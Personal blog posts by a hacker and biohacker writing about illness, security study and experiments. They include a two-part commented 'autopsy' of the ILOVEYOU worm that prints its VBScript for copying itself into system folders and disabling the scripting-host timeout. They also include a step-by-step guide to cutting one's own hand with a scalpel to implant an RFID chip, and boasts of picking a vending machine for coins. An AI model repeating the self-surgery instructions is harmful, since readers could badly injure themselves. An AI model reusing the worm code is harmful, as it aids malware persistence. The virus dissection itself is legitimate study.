the winter feast

it will probably be christmas day by the time most of you read this, or later. i hope you have or had a good day wherever you were or whatever you were doing. may 2017 be less shit than 2016 was.

if you sent me email in the last year, i'm really sorry for not replying to you. i do read most of what arrives but there's a high volume of spam plus a similarly high volume of legit emails, so it's hard to reply to them all when you have no motivation to do ordinary day to day tasks and even less to interact with people.

my partner is looking after me - he's doing a good job. i have not been very well this last year, and it didn't help that i spent about six months trying to do a networking qualification that was too advanced for me and not actually relevant to my eventual CEH qualification since i already know basic networking (it turns out that the one i was trying to do, the CompTIA Network+, is actually quite high level and involves a LOT of background reading for someone who has been on the programming or security side of things rather than the network engineering side. it's probably a fantastic exam to take if you want to be able to understand the logistics of every network everywhere and be able to engineer the perfect network for the situation your clients are in, every time, but it is way too in depth for a hacker to learn from scratch.) i've contacted the training provider about this & luckily they were really understanding - they apologised for having suggested the Network+ to me on the phone, and reset the time i had paid for so that i didn't pay for six months of wasted training and stress that got me nowhere. i'm currently working on the CompTIA Security+ & should be going back to that after christmas. i haven't done lots and lots of it but it seems like it's a lot closer to what i've been teaching myself for all this time than the Network+ was.

i am trying to be more accessible this coming year. my immediate plans are to attempt to restart my haptic compass project, and to complete my magnetic implant array. this will eventually also involve removing the failed experimental debris left in my right small finger (this debris is what you could see in the short BBC3 documentary, for those that asked - it is the encapsulated remains of a node whose experimental covering i was testing. it no longer works and will have to be removed before i can use the space to install a new node but this would be a long and involved surgery with a lot of pain and for this reason i have been avoiding it.)

merry christmas to you all, and many happy winters to come

cc

L

new hardware

i finally have replacement hardware, a Lenovo laptop replete with Windows Vista. Fedora Core 9 comes out on Tuesday, so i'll be jacked up and Linified by Tuesday night and waiting to dump more newbie-hacker crap on y'all. i also have new custom ink lined up for then, and a couple new piercings doing their best to heal up within the confines of my slightly shit immune system, plus new (hot) Scottish nookie, so all in all i'm a pretty happy little bastard right now. i might even have a job.

anyway. few challenges are gonna be working with the Broadcomm chipset for wireless under Core 8 (i seem to remember that needing madwifi), making the weird combo memory card reader and the fingerprint auth device work at all - especially the fingerprinter, i'll be fucking chuffed if i can get that shit working. it's a swiper rather than a presser, too, which makes it harder to hack; i'd want to dust the keyboard, monitor and case for prints, relief one into a mould and make a gelatine finger to test that before i could say i was sure though. biosecurity is pretty cool, but we've all seen it's far from infallible.

does give me a little more trust in Windows, though, although disturbingly i don't think the regular auth protocol has been disabled in favour of fingerprints. i'd have passwords required as well as prints, or as a backup only if the prints failed, but not as an either-or option...

so kids, fingerprints are fun but won't keep the robbers away, Scots are all hardcore motherfuckers, and remember - Tramadol fucks you up.

L

tramadol fucks you up #1113203

yeah, it's that time of the something again:

tramadol fuck me up
do tramadol fuck u up
how much tramadol does it take to get fucked up
can tramadol fuck you up?
solpadol tramadol
will tramadol fuck you up[
tramadol fucked up
does tramadol fuck you up?
hack userpic i'm not teaching you how to create malicious images just so you can go fuck up a Windows user or two.

"tramadol fucks you up" is so gonna be the title of my autobiography.

L

boku wa user ga hanasemasen

man, i now know what the word overload truly means. i'm trying to make a C program display tag output correctly, prototype a game-selling system interface, build (and understand) analogue sensors for my team's stupid-ass Lego robot, figure out how many photons per second are given off by a fucking 200W lightbulb (undergraduate quantum physics course), do laundry, read Anderson's seminal security engineering text, fix my damn Atheros card and calculate a dosage of dihydrocodeine that results in neither me bitchslapping my robotics team because the pain is pissing me off nor passing out in the corridors and getting groped and/or looted by the unscrupulous. it's a riot, sure, i'm as wired as i've ever been without the use of schmethamphetamines (fuck you, Google spider), but without stimulants, i just fucking collapse.

so instead of actually working, i'd like to point y'all to LSO's challenge server, challenge.learnsecurityonline.com. that's why i'm still up at 3:30: it feels so good to get root, you'll forgo sleep.

which leads me to my actual point: techheads are always percieved as being isolated from "real life" (i'm not gonna go into the semantic idiocy of that phrase right now), but up until now i've seen that as a kind of stupid myth. this last month or so has really changed my mind.

starting up, people's reactions to the kind of shit that doesn't even get a shrug from a hacker. the chip in my hand inspires about 1 "hey that's cool" or "you could use that for X random application" for every 99 "oh my god that's so fucking gross get that the fuck out of your body you fucking headcase". i've been seeing weird discrepancies in how tech people react to the world compared to the machine-illiterate, too: walking into a classroom with two unlabelled doors, i say to the guy next to me, "you know, that's really bad interface design", and then realise that's a fucking stupid thing to think. likewise, i keep trying to hit Ctrl-C Ctrl-V when faced with having to copy out bits of meatspace paper, and forgetting not to use the word meatspace when that's where i am, and i know there are guys out there way worse than me.

the problem is, that doesn't only isolate you from students, it gives tech itself a bad image. it also makes it virtually impossible to interact with endusers and clients meaningfully - you write in your docs, "bitsetq -a -f -x -q" and your users look at you and go, "hay lepht wtf is terminal anyways?" equally, students who listen to you won't ask questions if they hear one huge pile of jargon and unfamiliar concepts, they just give up. i'm gonna have to learn to act like a normal human being if i wanna deal with these people, and that's a huge part of what my job involves.

i think i've been in denial about that, trying to convince myself i think the same way as a social scientist or a historian, and it's seeming more and more like i was bullshitting myself. i guess we all gotta learn to speak user; seems to me like otherwise, users won't speak to us.

L

meathacked

fuck yeah, there's a chip in the hand i'm not typing with. it took longer and hurt more than i expected, but bled a lot less; the first thing i'm gonna do as a cyborg (pfft) is a. scare the shit outta the kiddies in the spring term's first lecture, and b. show you guys how to be just as irresponsible and foolhardy as me.

first up, i should explain why the fuck i did this. for a start, it's gonna make some awesome crypto projects - the chip is inherently insecure, seeing as how it broadcasts in cleartext, and i'm really fucking interested in how they can be incorporated into securer systems. also, i've been wanting to do this just to prove to myself i could ever since reading Battle Angel Alita and being told by a seven-year-old that i couldn't take a pinprick without my pain pills (little shit). i think this and my countless liver-purgings sans analgesia have proved that kid wrong =] third, i did it cause i wanted to know what it was like, plain and simple.

second, why i did it this way, in a student bathroom, instead of having it shot in like a normal... dog whose owners don't wanna lose it. like i've yelled about before, .gov health services won't do this sorta thing for a few reasons: takes up real patients' time, isn't medically necessary, i might sue (yeah...) there's no vet in my part of town, and i doubt they'd do it anyway, so i was left on my own...

so how to do it? aw, here goes. i'm assuming you got a rice-grain type glass ampoule tag.

1. gather ya tools. you need a sterile scalpel (Swann-Morton disposables are the cleanest bet, but a boiled and Milton'd surgical knife would be way more efficient), wound spray or iodine for cleaning the area and the incision, gauzes, steri-strips, fabric strapping and cotton wool. also, it's good to have TCP or Milton liquid antiseptic on hand in case shit gets nasty. you're also gonna want a permanent marker, in addition to the tag itself.

2. find a buddy to help ya out (preferably a non-squeamish buddy who's at least a bio student) and a secure, clean bathroom or kitchen to do the "operation" in. it's this buddy's job to spot you, help you make the big cut, swab while you're inserting the chip, help you dress the wound and call 999 if you nick an artery.

3. get ya marker. now, put your hand flat on a surface. look for the triangular, vein-free area between the bones of your index finger and thumb; that's where we're gonna insert the chip. draw a solid line a centimetre long, in the clearest part of this area you can see, parallel to your thumb. you gotta get it the right way round though.

4. make sure the area is really clean, then wash your hands like you had TB and sterilise them all over with the wound spray or Milton. you can wear latex gloves if that's easier to work in. have your buddy wash and steri his hands too.

5. now for the pain. get something to bite, and make the first cut all the way along your marker guideline on your hand. it'll take about ten or twenty strokes of the scalpel before you get deep enough to insert anything, and brother, it will hurt like fuck. get your buddy to take over if you get the shakes, make sure you keep swabbing the blood away with Milton or whatever, and stop when you're about two mil deep and you can see distinct lips of skin on either side of the wound.

6. and now for the fucking nasty part. push the end of your ampoule chip underneath the 'lip' closest to the index finger bone, where it'll probably lodge. now shove that motherfucker in until you can't see any of it - it can go under the skin, you just need to force it. this will also hurt a lot, but just do it all at once or you'll never make it.

7. once you can't see any part of the tag, swab the wound until you can close it with steri-strips, then sterilise the whole hand again, and cover the strips with a gauze pad. bind your hand up real tight with the strapping and get yourself and your buddy a shot, cause bro, it's over.

so, uh, enjoy yourselves. more on this once it heals.

L

l's fedora project

okay, so you're running Windows. even worse, you're running Vista - no tools, no drivers, no nothing. en plus, you live under a pseudorepressive government with human rights-crushing surveillance powers and the sudden inclination to smash the shit out of every hacker and security consultant it comes across who can't prove they weren't using their tools for t3h_kr1mz, and you ran out of funding a good couple years or so - well, my friends, then you're in my (slightly overdosed) situation, and it's Linux time.

on the advice of the peeps at LSO, which you should go check out, i've converted my crap little laptop to a Fedora Core 8 box. and now begins the fight.

(dings its little wrestling bell) round one - local cripple versus MADWifi 0.9.3, FIGHT!

L

for the last time:

tramadol fuck you up?
"windows scripting host\settings\timeout"
how much tramadol fucks you up
will tramadol fuck you up
does tramadol fuck you up
solpadol
does Tramadol fuck you up ?

YES, for fuck's sake, tramadol fucks you up. it fucks you up bad. you won't be able to program properly, you sure as shit won't be able to do maths, you won't even feel like trying to do sports or anything active, you'll throw up all the time, you'll look and sound like an authentic pothead and you'll lose any interest you ever had in anything but sleep.

[kudos to the guy who kept looking for the Registry setting that messes with the WSH's timeout, though. it's under HKLM/Software/Microsoft/Windows iirc, and its main malicious use is to get rid of the timeout completely so viruses can run free and never be killed because of inactivity.]

mang, i hope i don't get readers who hate profanity.

L

idiocy has no lowest low

as demonstrated by the not one, but two students in my algorithms course who don't use any AV or firewalls whatsofuckingever on their Windows XP boxes. one of them refuses because Norton slows down his games (and apparently Norton is the only damn AV suite out there), and the other told me nonchalantly

"Oh, it's OK, I just wait until it gets really bad and then reinstall the operating system."

i can't believe i gotta do this, cause it's like having to give sex ed classes to nineteen-year-olds - in fact some of us are older than that - but here's the reasons why yeah, you do have to run AV:

1. you protect your data: i believe the American for that is duh. especially in university, where losing all your work will fuck you over good and proper, this should be one of your first priorities.

2. you also protect a hell of a lot more, because when you're at least moderately AV'd, you don't get drawn into botnets: that is, you don't fall to 10% of your system's capacity because your machine is running a DDoS attack on some Russian's ex, you don't get arrested for data fraud your compromised machine committed or the pr0n server you had no idea it had become, you don't suddenly find your hard drives the playground of a gang of twenty 1337-speaking SubSeven fans... you see where i'm going here.

3. your identity is a small margin safer when it's not at risk of being grabbed by trojans. that is, your identity which comprises access to your entire private life, your home, your finances, your job and employment history... yeah.

4. your browser history is shielded from cookie-spy trojans, which in turn means you're getting less spam, less ad downloaders, and therefore, you're less likely to get scammed or infected secondarily.

5. AV can also protect you from rogue P2P nodes, meaning you've got less of a chance of getting your ass RIAA'd.

6. your system is more under your control, making it a hell of a lot easier both to trace and retaliate against genuine attacks (rather than virus damage), and to see where memory is leaking - if there are virii loose all over the shop, you've got pretty much no chance of speeding the system up or getting any kind of security. without security apps, you're basically operating in a warzone that could just as easily be a comfortable living room.

7. you're not just endangering your own machine: if you're on my network with no AV, you're essentially a huge, neon-lit gateway to everything else that's on there, unsuspecting, thinking it's safe. one unprotected host compromises the entire net, making the damage inflicted by a virus on the net 100% your fault, and the costs of repair your liability.

all of that is a shorthand for the question why the fuck? having no antivirus is just as stupid as not using condoms, or refusing to lock your apartment door because you've never been robbed before. amazingly, however, the offenders know all this and still haven't done shit about it.

i'm debating whether it's justifiable to isolate their machines and hit them with something nasty just to spank them into submission. idiocy really does have no lowest low.

L

martian aliens they ate my Wijit

so you've all noticed the little Lijit widget over there in the top corner. some of you decided to play hooky with the widget, too. here's what you asked me for this week:

1. solpadol (8 times) look, you can't have my meds, OK? it's my Solpadol, and you'll have to beat me up to get it. why don't any of you want the Diproflex or the Zopiclone, anyway?
2. label (2 times) huh?
3. 1190311124113 (2 times) i'll explain this in a second.
4. anonym for arrogant (1 time) no, Anonym for President! i'm pretty much against arrogant.
5. 1190068085886 (1 time)
6. 1190068226397 (1 time)
7. atheist golden rule (1 time) you want this here rule.
8. -1 (1 time)
9. 1190480612750 (1 time)

okay, so what the fuck is with these number string searches? i got two hypotheses myself: 1: DoS / code injection attempt from a moron, and 2. attempt by aliens to find the last digit of pi by sending bits of the known sequence to me, an obvious expert in theoretical mathematics.

a tenner says it's aliens.

Lepht

ed.: in addition to the Wijit, i finally got my ass on sitemeter. stats widget is at the bottom of the sidebar; scroll on down and satisfy your lust for statistics. - L

to the CCTV operators:

yes, it is i you see march into the laboratory foyer at 1639 determined to grab a Snickers. it is i you see shoving coins into the vendi and kicking it when it doesn't work, and it is also i who can then be observed using a high-grade Southord C2010 pick set to get both the coins i lost and the coins everyone else lost outta the damn slot where they're all stuck. for the three minutes or so it takes me to do that, you may also observe three security guards walk right past me, one of whom stops and immediately walks away after i give him the explanation (and i quote) "Locksmith."

and that is why i am now £5.25 richer, and also have both Snickers and much less confidence in you guys. i mean, you're in the damn lab building, for fuck's sake.

virus autopsy: ILOVEYOU, pt.2

*click* returning to the autopsy of the ILOVEYOU virus. time is 2340, at the last session we saw the subject's mechanisms for stopping timeouts, allowing itself to remain active indefinitely. it's time to look at some more. forceps!

025 ' Create 3 copies of the script in Windows, system and in the temporary folders
026 set dirwin = fso.GetSpecialFolder(0)
027 set dirsystem = fso.GetSpecialFolder(1)
028 set dirtemp = fso.GetSpecialFolder(2)
029 set c = fso.getFile(WScript.ScriptFullName)
030 c.Copy(dirsystem&"\MSKernel32.vbs")
031 c.Copy(dirWin&"\Win32DLL.vbs")
032 c.Copy(dirtemp&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
033

ah, how very devious! how marvellously malicious... or perhaps not. (note the inelegant coding, once again.) what it's doing here is using the fso object it created earlier to copy itself to three locations: the root of the Windows directory, that of the temp directory, and that of the System directory. these are generally the first three locations modern AV ware will scan, because they're obvious choices. let's see what it wants to do next. scalpel!

034 ' Adjust Internet Explorer's standard starting page to one of the 4 URLs, in order to download data that you will be able to launch
035 'download. If this data has already been downloaded it will automatically be started next time Windows is booted
036 'and the start page of Internet Explorer is reset to a blank page.
037 regruns()
038 'create an HTML that launches the component ActiveX as well as one of the copies of the script
039 html()
040 ' Send the copy of the script to all entries in the Outlook address book
041 spreadtoemail()
042 'overwrite specific data using the script
043 'if the data are not yet scripts, script data with the same name as the data are created
044 'with the ending .vbs
045 'delete the original data
046 'a script that automatically sends the Email worm to all persons in the IRC channel is attached to Mirc
047 listadriv()
048 end sub

hm. here we see it calling four subroutines, regruns(), html(), spreadtoemail(), and listadriv(), and quitting. next time we'll be looking at the regruns() process, its first port of call. shove it back in the freezer, nurse. time is 0011. *click*

virus autopsy: ILOVEYOU, part 1

*click* 2213 hours. subject... whoof, subject's been in the virus mortuary for a good long while now, that's disgusting. subject appears to have been a VBScript email-propagator by the name of ILOVEYOU, recieved as an attachment and requiring a manual launch by the user to activate.

scalpel. thorax incision reveals...

001 rem barok -loveletter(vbe) (i hate go to school)
002 rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila, Philippines
003
004 On Error Resume Next
005 dim fso, dirsystem, dirwin, dirtemp, eq, ctr, file, vbscopy
006
007 eq = ""
008 ctr = 0
009 set fso = CreateObject("Scripting.FileSystemObject")
010 set file = fso.OpenTextFile(WScript.ScriptFullname, 1)
011 vbscopy = file.ReadAll
012

ach, handkerchief. handkerchief! thankyou nurse. aside from an infestation of bad English, subject is Filipino and seems to have been healthy at time of death. here you see the variable declarations, all in good health, and the inelegant initialisations of three of them just to read the filesystem... i'll remove them and go under the ribcage.

013 main()
014
015 sub main()
016 On Error Resume Next
017 dim wscr,rr
018 set wscr=CreateObject("WScript.Shell")
019 ' checks the time out of Windows scripting host
020 rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
021 if (rr>=1) then
022 ' change the script to endless:
023 wscr.RegWrite(HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout", 0, "REG_DWORD")
024 end if

alright, hold it there, nurse. you see that? the thing's setting the Windows Scripting virtual machine's timeout to zero, to stop it from timing out and exiting before the script is finished. devious, but not devious enough... i think we're done for tonight, nurse.

next time, we're gonna be getting to the real meat of this autopsy - i'll be dissecting the main processes of the virus, and you'll get to be personally splattered in the gore.

but i am invincible!

today, we sit our asses down in the morgue of the computer world, the University lab, for a simple post-mortem. as you've probably gathered, the networks i get to play with here are huge; massive, dynamic systems, thousands of terminals, hundreds of printers, upwards of twenty main servers and i don't even wanna know how many miles of base-1000 cable. it's fairly well-secured, and not thanks to me (hell, i didn't set the security systems up): the labs are secured by swipecard access, you can't logon without a current username and password, and the password system is... adequate. the Unix servers are actually very well-defended, i can tell you.

and yet it's not secure. it is possible to hack the main server in three steps.

i'll give you a hint: the first step is to walk up the stairs to the helpdesk, which is in the Department's offices and not the Directorate's: the Department is the teaching arm of Computing, whereas the Directorate handles the running of labs, the wireless, username allocation, email and all the rest of the machine shit that the non-inducted use on a daily basis.

winner is the first who can tell me how. there's no prize, just glory.

crypto? is that some Southern kid's name?

i'm always amazed at this. on looking at the passwords for a small section of a network, i found that despite the strict password policy, all the passwords but three - out of several hundred - were words. the policy demands alphanumerics and mixed case, so most users had a "Password123"... oy.

i asked a couple other users what the hell was with that. the response?

"Well, normal people can't remember codes."

like fuck they can't. i'm a normal person, apart from being slightly better educated than the general public, and i remember about 10 different alphanumeric codes with random punctuation marks for all the different shit i have to authenticate to in a day (use mnemonics!). if you have to use each code once or twice a day, it really isn't difficult to memorize them; and these other students only have the one system password that's enforced to be so complex. the rest of their passwords, for all the things i keep seeing them wasting their time with - Bebo or Myspace, usually (you know what i think of Bebo and Myspace) - are set by themselves, of course, and they're uniformly simple.

so what's the problem? why can't you remember one code? i guess that's a question for a psychologist. my problem with this is that when they can't remember it, they write it down; and when they write codes down, the security of our collective system is down to someone not finding the paper.

obviously, that ain't acceptable. my solution with my own citadel was to implement a token system, which i'm in the process of linking to a chip in my hand (more on that when it's more developed) - and i'm unfortunately not allowed to RFID my compatriots. but i still think the token idea stands, and i'd kill to have a say on whether or not it's implemented here.

here's how the simplest token protocol works, from the seminal textbook, Ross Anderson's Security Engineering:

you have a token, a little transponder thing that can be shaped like a key, or a button, or even embedded in your ID card or something. i have a gate, or a door. you walk up to the door, and your token sends a string to the door's reciever:

token -> gate: serial number, {serial number, onetime number}

the stuff in braces is encrypted under a key known to both the transponder and the reciever, meaning my gate can then decrypt it, check that the two serial numbers match, check that the onetime (Anderson calls it a nonce, but in my country that's slang for a child molester...) hasn't been used already (this way i know you're not just replaying someone else's earlier access attempt) and lets you in.

now, replace the gate with the logon system, and you're flying. it's a little more difficult than that, unfortunately, so i won't be seeing it around here anytime soon. unfortunately, the fact remains:this kind of system is the only way to let normal people slack off remembering their codes.

so: either ya remember your damn password, or you let a totally non-medically qualified, slightly paranoid security nut embed machinery in your hand. okay?

...where are you going?


Lepht

a message from the User!

more correspondence on audio, this time from the man, James Atkinson of the Granite Island Group. i'm actually quite impressed that he replied to me in the first place, seeing as in this sphere, i'm kind of scum. a peasant of the white-hat world, if you will.

It is properly called "audio correlation" where a known audio signal (pressure waves) are induced into an area, and then those same signals are measured both as a physical movement elsewhere, or matching electrical response is sought..

it's a little over my head, seeing as Atkinson is officially trained in TEMPEST, and i'm a dabbler, but i think this might mean you could use the audio signals as a means to verify an image of your target's monitor you obtained via other ways. i've asked him for clarification, and meanwhile, yours truly has about half an experiment proposal finished...

and now, on to today's a la carte special: crispy fried bitch with extra cheese. roquefort, no less.

it is known otherwise as "For fuck's sake, it's spelled 'ATHEIST'."


Lepht
(baby-eating "athiest fundamentalist")

what time is it?

my fellow geeks of the Interweb: we may have some serious experimental fun on our hands, the kind that were i twelve years old i should spell "phun". i've recieved a reply from the admin of cryptome.org, who i won't name out of respect:

You're on the right track. Audial leakage of surveillance equipment is
used by counter-surveillance experts to pick up inadvertent signals.
Audial emanations of other electronic equipment are certainly
likely but I've not seen a study of it.
[...]
Let me know what you come up with, we've not published anything
on audial TEMPEST.

what time is it? it's EXPERIMENTATION TIME.

Lepht

audial TEMPEST

sit down at any lab PC or perhaps at your home machine, jack in your headphones and reboot. during the boot sequence, and under various OS, during periods of high system activity, you'll hear strange low-volume audial chatter - i'm pretty sure it's been abused by woos to make "electronic voice phenomena", in fact.

i got a different hypothesis about this chatter. i think it's a form of data leakage; like a Category III-risk optical TEMPEST indicator - a HDD status LED or the indicator LED on some routers and broadband modems - it seems to correspond to the data passing through the device. on a PC, you hear what seem to be unique patterns of chatter during application startups, writes to and reads from the HDD, and when joining or acceding from a network.

this is to my curiosity what liquid oxygen is to a barbecue. i have got to find out whether data from my networks is leaking out the sound card as well as out the emissions of the components, the old-school cathode-ray monitors and half the LEDs on everything.

therefore, i have a new research project. i'll be back with all the existing research i can find on the subject ASAP. you guys are in for an ethically awesome, fact-finding, data-jacking, network-sniffing, audially-challenging goddamn adventure!

my Zero Cool-emulating childhood self would be really impressed with this.


Lepht